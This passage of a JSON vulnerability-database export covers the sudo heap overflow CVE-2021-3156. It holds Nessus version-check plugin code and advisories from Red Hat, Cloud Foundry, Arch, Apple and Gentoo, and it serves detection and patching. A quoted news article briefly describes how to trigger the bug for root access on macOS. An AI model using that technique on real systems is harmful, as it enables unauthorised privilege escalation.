value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'sudo-1.9.5-2.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0224 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 7 : sudo (RHSA-2021:0224)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:7.4", "cpe:/o:redhat:rhel_tus:7.4::server", "cpe:/o:redhat:rhel_e4s:7.4::server", "cpe:/o:redhat:rhel_aus:7.4::server", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "cpe:/o:redhat:rhel_tus:7.4", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_aus:7.4"], "id": "REDHAT-RHSA-2021-0224.NASL", "href": "https://www.tenable.com/plugins/nessus/145495", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0224. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145495);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0224\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 7 : sudo (RHSA-2021:0224)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0224 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.4::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.4::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.4::server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '7.4')) audit(AUDIT_OS_NOT, 'Red Hat 7.4', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_aus_7_4_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-aus-source-rpms__7_DOT_4__x86_64'\n ],\n 'rhel_e4s_7_4_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-debug-rpms',\n 'rhel-7-server-e4s-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-rpms',\n 'rhel-7-server-e4s-optional-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-source-rpms',\n 'rhel-7-server-e4s-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-e4s-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-source-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-debug-rpms__7_DOT_4__x86_64',\n 'rhel-ha-for-rhel-7-server-e4s-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-rpms__7_DOT_4__x86_64',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms__7_DOT_4__x86_64'\n ],\n 'rhel_tus_7_4_server': [\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-source-rpms',\n 'rhel-7-server-tus-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-source-rpms',\n 'rhel-7-server-tus-source-rpms__7_DOT_4__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0224');\n}\n\npkgs = [\n {'reference':'sudo-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']},\n {'reference':'sudo-devel-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']},\n {'reference':'sudo-devel-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2021-02-10T23:29:23", "bulletinFamily": "software", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "## Severity\n\nHigh\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n## Description\n\nIt was discovered that Sudo incorrectly handled memory when parsing command lines. A local attacker could possibly use this issue to obtain unintended access to the administrator account. (CVE-2021-3156)\n\nIt was discovered that the Sudo sudoedit utility incorrectly handled checking directory permissions. A local attacker could possibly use this issue to bypass file permissions and determine if a directory exists or not. (CVE-2021-23239)\n\nCVEs contained in this USN include: CVE-2021-3156, CVE-2021-23239.\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * cflinuxfs3 \n * All versions prior to 0.222.0\n * Xenial Stemcells \n * 456.x versions prior to 456.135\n * 621.x versions prior to 621.99\n * All other stemcells not listed.\n * CF Deployment \n * All versions prior to 16.0.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * cflinuxfs3 \n * Upgrade All versions to 0.222.0 or greater\n * Xenial Stemcells \n * Upgrade 456.x versions to 456.135 or greater\n * Upgrade 621.x versions to 621.99 or greater\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells>).\n * CF Deployment \n * Upgrade All versions to 16.0.0 or greater\n\n## References\n\n * [USN Notice](<https://usn.ubuntu.com/4705-1/>)\n * [CVE-2021-3156](<https://people.canonical.com/~ubuntu-security/cve/CVE-2021-3156>)\n * [CVE-2021-23239](<https://people.canonical.com/~ubuntu-security/cve/CVE-2021-23239>)\n\n## History\n\n2021-02-10: Initial vulnerability report published.\n", "edition": 1, "modified": "2021-02-10T00:00:00", "published": "2021-02-10T00:00:00", "id": "CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3", "href": "https://www.cloudfoundry.org/blog/usn-4705-1/", "title": "USN-4705-1: Sudo vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-02-04T12:26:48", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "Arch Linux Security Advisory ASA-202101-25\n==========================================\n\nSeverity: Critical\nDate : 2021-01-20\nCVE-ID : CVE-2021-3156 CVE-2021-23239\nPackage : sudo\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-1431\n\nSummary\n=======\n\nThe package sudo before version 1.9.5.p2-1 is vulnerable to multiple\nissues including privilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 1.9.5.p2-1.\n\n# pacman -Syu \"sudo>=1.9.5.p2-1\"\n\nThe problems have been fixed upstream in version 1.9.5.p2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-3156 (privilege escalation)\n\nA serious heap-based buffer overflow has been discovered in sudo before\nversion 1.9.5p2 that is exploitable by any local user. It has been\ngiven the name Baron Samedit by its discoverer. The bug can be\nleveraged to elevate privileges to root, even if the user is not listed\nin the sudoers file. User authentication is not required to exploit the\nbug.\n\n- CVE-2021-23239 (information disclosure)\n\nA security issue was found in sudo before version 1.9.5. A race\ncondition in sudoedit could have allowed an attacker to test for the\nexistence of directories in arbitrary locations in the file system.\n\nImpact\n======\n\nAny unprivileged user can escalate privileges, and a local attacker\ncould figure out file locations through a race condition.\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/01/11/2\nhttps://www.sudo.ws/alerts/unescape_overflow.html\nhttps://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nhttps://www.openwall.com/lists/oss-security/2021/01/26/3\nhttps://www.sudo.ws/repos/sudo/rev/9b97f1787804\nhttps://www.sudo.ws/repos/sudo/rev/a97dc92eae6b\nhttps://www.sudo.ws/repos/sudo/rev/049ad90590be\nhttps://www.sudo.ws/repos/sudo/rev/09f98816fc89\nhttps://www.sudo.ws/repos/sudo/rev/c125fbe68783\nhttps://www.sudo.ws/repos/sudo/rev/ea19d0073c02\nhttps://security.archlinux.org/CVE-2021-3156\nhttps://security.archlinux.org/CVE-2021-23239", "modified": "2021-01-20T00:00:00", "published": "2021-01-20T00:00:00", "id": "ASA-202101-25", "href": "https://security.archlinux.org/ASA-202101-25", "type": "archlinux", "title": "[ASA-202101-25] sudo: multiple issues", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2021-02-10T04:43:56", "bulletinFamily": "software", "cvelist": ["CVE-2021-1806", "CVE-2021-3156", "CVE-2021-1805"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update*, macOS Mojave 10.14.6 Security Update 2021-002\n\nReleased February 9, 2021\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1805: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-1806: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Sudo**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7, macOS Mojave 10.14.6\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: This issue was addressed by updating to sudo version 1.9.5p2.\n\nCVE-2021-3156: Qualys\n\n\n\n* After installing this update, the build number for macOS Catalina 10.15.7 is 19H524.\n", "edition": 1, "modified": "2021-02-09T06:28:25", "published": "2021-02-09T06:28:25", "id": "APPLE:HT212177", "href": "https://support.apple.com/kb/HT212177", "title": "About the security content of macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update, and macOS Mojave 10.14.6 Security Update 2021-002 - Apple Support", "type": "apple", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2021-02-10T13:03:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1805", "CVE-2021-1806", "CVE-2021-3156"], "description": "[](<https://thehackernews.com/images/-aWsoAGGR3bg/YCOy9lQs-iI/AAAAAAAABuM/vNAeBWmdBzoyPSLOrMMWnCCOy-WGxwBBwCLcBGAsYHQ/s0/macos-hacking.jpg>)\n\nApple has rolled out a fix for a critical sudo vulnerability in macOS Big Sur, Catalina, and Mojave that could allow unauthenticated local users to gain root-level privileges on the system.\n\n\"A local attacker may be able to elevate their privileges,\" Apple [said](<https://support.apple.com/en-us/HT212177>) in a security advisory. \"This issue was addressed by updating to sudo version 1.9.5p2.\"\n\nSudo is a common utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user.\n\nTracked as **CVE-2021-3156** (also called \"**Baron Samedit**\"), the vulnerability first came to light last month after security auditing firm Qualys [disclosed](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>) the existence of a heap-based buffer overflow, which it said had been \"hiding in plain sight\" for almost 10 years.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nThe vulnerability, which was introduced in the code back in July 2011, impacts sudo versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1, following which the maintainers released [1.8.32 and 1.9.5p2](<https://www.sudo.ws/alerts/unescape_overflow.html>) to resolve the issue.\n\nWhile the weakness can only be exploited by an attacker already having access to a vulnerable host, the barrier could be easily bypassed by planting malware on a device or brute-forcing a low-privileged service account.\n\nIn its report, Qualys researchers said they managed to develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2).\n\nBut last week, British security researcher Matthew Hickey discovered that the vulnerability also extended to the [latest version](<https://support.apple.com/en-us/HT212147>) of macOS Big Sur 11.2, prompting Apple to address the security shortcoming.\n\n\"CVE-2021-3156 also impacts @apple MacOS Big Sur (unpatched at present), you can enable exploitation of the issue by symlinking sudo to sudoedit and then triggering the heap overflow to escalate one's privileges to 1337 uid=0,\" Hickey [tweeted](<https://twitter.com/hackerfantastic/status/1356645638151303169>) on February 2.\n\nBesides the fix for the sudo vulnerability, Tuesday's supplemental security update also includes patches for two flaws in Intel Graphics Driver (CVE-2021-1805 and CVE-2021-1806), which could cause an application to execute arbitrary code with kernel privileges.\n\nThe vulnerabilities, which stem from an out-of-bounds write and a race condition, respectively, were rectified with additional validation, the iPhone maker said.\n\nMac users who haven't opted to check for updates automatically can head to Apple menu &gt; System Preferences, and then click Software Update to [download and install](<https://support.apple.com/en-in/guide/mac-help/mchlpx1065/mac>) the latest updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-10T12:57:48", "published": "2021-02-10T10:23:00", "id": "THN:AF0CBD71A7E1DCE8E508D374E0760687", "href": "https://thehackernews.com/2021/02/apple-patches-10-year-old-macos-sudo.html", "type": "thn", "title": "Apple Patches 10-Year-Old macOS SUDO Root Privilege Escalation Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2021-01-27T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2020-23240", "CVE-2021-3156", "CVE-2021-23240"], "description": "### Background\n\nsudo (su \u201cdo\u201d) allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. \n\n### Description\n\nMultiple vulnerabilities have been discovered in sudo. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nLocal users are able to gain unauthorized privileges on the system or determine the existence of files. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.9.5_p2\"", "edition": 1, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "GLSA-202101-33", "href": "https://security.gentoo.org/glsa/202101-33", "title": "sudo: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}]}